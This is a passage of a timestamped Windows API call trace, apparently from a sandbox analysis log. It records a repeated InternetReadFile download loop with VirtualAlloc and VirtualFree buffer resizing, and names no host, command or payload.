flProtect=0x4) returned 0x35b0000 [0098.878] VirtualFree (lpAddress=0x35d4000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.879] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.879] VirtualFree (lpAddress=0x35e8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.879] VirtualAlloc (lpAddress=0x35c4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c4000 [0098.881] VirtualFree (lpAddress=0x35b0000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0098.881] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.882] VirtualAlloc (lpAddress=0x35d8000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d8000 [0098.883] VirtualFree (lpAddress=0x35c0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.884] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.884] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.885] VirtualFree (lpAddress=0x35d4000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.886] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.886] VirtualAlloc (lpAddress=0x35c4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c4000 [0098.886] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.887] VirtualFree (lpAddress=0x35e8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.887] VirtualAlloc (lpAddress=0x35c8000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c8000 [0098.888] VirtualFree (lpAddress=0x35b0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.888] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.889] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0098.889] VirtualFree (lpAddress=0x35dc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.890] VirtualFree (lpAddress=0x35c4000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.891] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.891] VirtualFree (lpAddress=0x35d8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.892] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.893] VirtualFree (lpAddress=0x35e0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.894] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.894] VirtualFree (lpAddress=0x35f4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.895] VirtualAlloc (lpAddress=0x35c8000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c8000 [0098.896] VirtualFree (lpAddress=0x35b0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.896] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.897] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0098.897] VirtualFree (lpAddress=0x35dc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.898] VirtualFree (lpAddress=0x35c4000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.899] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.899] VirtualFree (lpAddress=0x35d8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.899] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.901] VirtualFree (lpAddress=0x35e0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.901] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.901] VirtualFree (lpAddress=0x35f4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.902] VirtualAlloc (lpAddress=0x35c8000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c8000 [0098.903] VirtualFree (lpAddress=0x35b0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.904] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.904] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0098.905] VirtualFree (lpAddress=0x35dc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.906] VirtualFree (lpAddress=0x35c4000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.907] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.907] VirtualFree (lpAddress=0x35d8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.907] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.909] VirtualFree (lpAddress=0x35e0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.909] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.910] VirtualFree (lpAddress=0x35f4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.910] VirtualAlloc (lpAddress=0x35c8000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c8000 [0098.911] VirtualFree (lpAddress=0x35b0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.912] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.912] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0098.914] VirtualFree (lpAddress=0x35c4000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.915] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.915] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.919] VirtualFree (lpAddress=0x35dc000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.921] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.923] VirtualFree (lpAddress=0x35f4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.924] VirtualAlloc (lpAddress=0x35c8000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c8000 [0098.931] VirtualFree (lpAddress=0x35b0000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0098.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.933] VirtualAlloc (lpAddress=0x35e0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e0000 [0098.936] VirtualFree (lpAddress=0x35c4000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.937] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.937] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.940] VirtualFree (lpAddress=0x35dc000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.941] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.941] VirtualAlloc (lpAddress=0x35c8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35c8000 [0098.942] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.942] VirtualFree (lpAddress=0x35f4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.942] VirtualAlloc (lpAddress=0x35cc000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35cc000 [0098.946] VirtualFree (lpAddress=0x35b0000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.946] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.947] VirtualAlloc (lpAddress=0x35e8000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e8000 [0098.947] VirtualFree (lpAddress=0x35e4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.949] VirtualFree (lpAddress=0x35c8000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.949] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.949] VirtualFree (lpAddress=0x35e0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.950] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.951] VirtualFree (lpAddress=0x35e8000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.952] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.952] VirtualFree (lpAddress=0x3600000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.952] VirtualAlloc (lpAddress=0x35cc000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35cc000 [0098.954] VirtualFree (lpAddress=0x35b0000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.955] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.955] VirtualAlloc (lpAddress=0x35e8000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e8000 [0098.956] VirtualFree (lpAddress=0x35e4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.957] VirtualFree (lpAddress=0x35c8000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.958] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.958] VirtualFree (lpAddress=0x35e0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.959] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.961] VirtualFree (lpAddress=0x35e8000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.961] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.961] VirtualFree (lpAddress=0x3600000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.961] VirtualAlloc (lpAddress=0x35cc000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35cc000 [0098.964] VirtualFree (lpAddress=0x35b0000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.965] VirtualAlloc (lpAddress=0x35e8000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e8000 [0098.965] VirtualFree (lpAddress=0x35e4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.967] VirtualFree (lpAddress=0x35c8000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.967] VirtualFree (lpAddress=0x35e0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.968] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.969] VirtualFree (lpAddress=0x35e8000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.970] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.970] VirtualFree (lpAddress=0x3600000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.970] VirtualAlloc (lpAddress=0x35cc000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35cc000 [0098.972] VirtualFree (lpAddress=0x35b0000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.972] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.973] VirtualAlloc (lpAddress=0x35e8000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e8000 [0098.974] VirtualFree (lpAddress=0x35c8000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0098.975] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.975] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.977] VirtualFree (lpAddress=0x35e4000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0098.977] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.977] VirtualFree (lpAddress=0x3600000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.978] VirtualAlloc (lpAddress=0x35cc000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35cc000 [0098.979] VirtualFree (lpAddress=0x35b0000, dwSize=0x18000, dwFreeType=0x4000) returned 1 [0098.980] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.980] VirtualAlloc (lpAddress=0x35e8000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35e8000 [0098.981] VirtualFree (lpAddress=0x35c8000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0098.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.982] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.983] VirtualFree (lpAddress=0x35e4000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0098.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.984] VirtualAlloc (lpAddress=0x35cc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x35cc000 [0098.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.985] VirtualFree (lpAddress=0x3600000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.985] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0098.987] VirtualFree (lpAddress=0x35b0000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0098.987] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.987] VirtualAlloc (lpAddress=0x35f0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f0000 [0098.988] VirtualFree (lpAddress=0x35ec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.989] VirtualFree (lpAddress=0x35cc000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0098.990] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.990] VirtualFree (lpAddress=0x35e8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.990] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0098.991] VirtualFree (lpAddress=0x35f0000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0098.992] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.992] VirtualFree (lpAddress=0x360c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.992] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0098.994] VirtualFree (lpAddress=0x35b0000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0098.995] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.995] VirtualAlloc (lpAddress=0x35f0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f0000 [0098.995] VirtualFree (lpAddress=0x35ec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.997] VirtualFree (lpAddress=0x35cc000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0098.997] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0098.998] VirtualFree (lpAddress=0x35e8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0098.998] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.000] VirtualFree (lpAddress=0x35f0000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0099.000] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.001] VirtualFree (lpAddress=0x360c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.001] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0099.002] VirtualFree (lpAddress=0x35b0000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0099.003] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.003] VirtualAlloc (lpAddress=0x35f0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f0000 [0099.004] VirtualFree (lpAddress=0x35ec000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.005] VirtualFree (lpAddress=0x35cc000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0099.006] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.006] VirtualFree (lpAddress=0x35e8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.006] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.008] VirtualFree (lpAddress=0x35f0000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0099.009] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.009] VirtualFree (lpAddress=0x360c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.009] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0099.010] VirtualFree (lpAddress=0x35b0000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0099.011] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.011] VirtualAlloc (lpAddress=0x35f0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f0000 [0099.013] VirtualFree (lpAddress=0x35cc000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.013] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.014] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.015] VirtualFree (lpAddress=0x35ec000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.016] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.016] VirtualFree (lpAddress=0x360c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0099.016] VirtualAlloc (lpAddress=0x35d0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35d0000 [0099.018] VirtualFree (lpAddress=0x35b0000, dwSize=0x1c000, dwFreeType=0x4000) returned 1 [0099.019] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.019] VirtualAlloc (lpAddress=0x35f0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35f0000 [0099.021] VirtualFree (lpAddress=0x35cc000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.069] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.069] VirtualAlloc (lpAddress=0x35b0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x35b0000 [0099.071] VirtualFree (lpAddress=0x35ec000, dwSize=0x20000, dwFreeType=0x4000) returned 1 [0099.072] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x29cfa64, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x29cfe68 | out: lpBuffer=0x29cfa64*, lpdwNumberOfBytesRead=0x29cfe68*=0x400) returned 1 [0099.072] VirtualAlloc 